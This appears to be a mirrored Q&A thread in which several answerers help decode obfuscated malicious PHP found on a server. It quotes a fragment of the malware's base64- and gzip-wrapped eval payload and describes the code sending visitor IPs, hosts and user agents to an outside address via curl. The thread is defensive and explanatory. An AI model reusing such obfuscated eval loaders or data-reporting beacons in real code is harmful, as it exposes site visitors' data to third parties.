PHP:帮助解码恶意代码

发布于 2024-12-15 22:47:29 字数 1550 浏览 1 评论 0原文

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(4

淡墨 2024-12-22 22:47:30

只需让它自行解码即可:打印 eval() 部分中的内容

php > var_dump(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM=')));  eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ==')));
string(33) "$GLOBALS['_2143977049_']=Array();"

Just let it decode itself: Print the content within the eval()-part

php > var_dump(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM=')));  eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ==')));
string(33) "$GLOBALS['_2143977049_']=Array();"
Bonjour°[大白 2024-12-22 22:47:30

基本上,这个脚本小子代码调用 http://91_196_216_64/btt.php?ip..... 并使用“curl”报告“REMOTE_ADDR”、“HTTP_HOST”、“HTTP_USER_AGENT”和“HTTP_REFERER” *'。

您可能想在路由器(而不是服务器)级别上阻止到该 IP 的任何 TCP/UDP 流量,或者花费一些美元在防火墙后面托管您的服务器。

编辑:如果服务器受到威胁,安全漏洞可以在任何地方安装,请确保您的备份数据是最新的,并且备用服务器随时准备接管。

Basically this script kiddie code calls http://91_196_216_64/btt.php?ip..... and reports back "REMOTE_ADDR", 'HTTP_HOST', 'HTTP_USER_AGENT' and 'HTTP_REFERER' using 'curl*'.

You may want to block any TCP/UDP traffic to that IP on your router (NOT server) level or spend some $$$ to host your server behind a firewall.

Edit: If a server is compromised, security hole(s) can be installed anywhere, do ensure that your backup data are up to date and a standby server is ready to take over anytime.

白云悠悠 2024-12-22 22:47:30

将该 eval 更改为打印,您将看到他们尝试执行的代码。

Change that eval to a print, and you'll see the code they're trying to execute.

万人眼中万个我 2024-12-22 22:47:30

只需echo 而不是eval。通常,它有很多层,但在解压缩后进行一些手动反混淆,您就可以弄清楚发生了什么。

Just echo instead of eval. Often times there are many layers to it, but with a little manual de-obfuscation after uncompressing it, you can figure out what is going on.

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文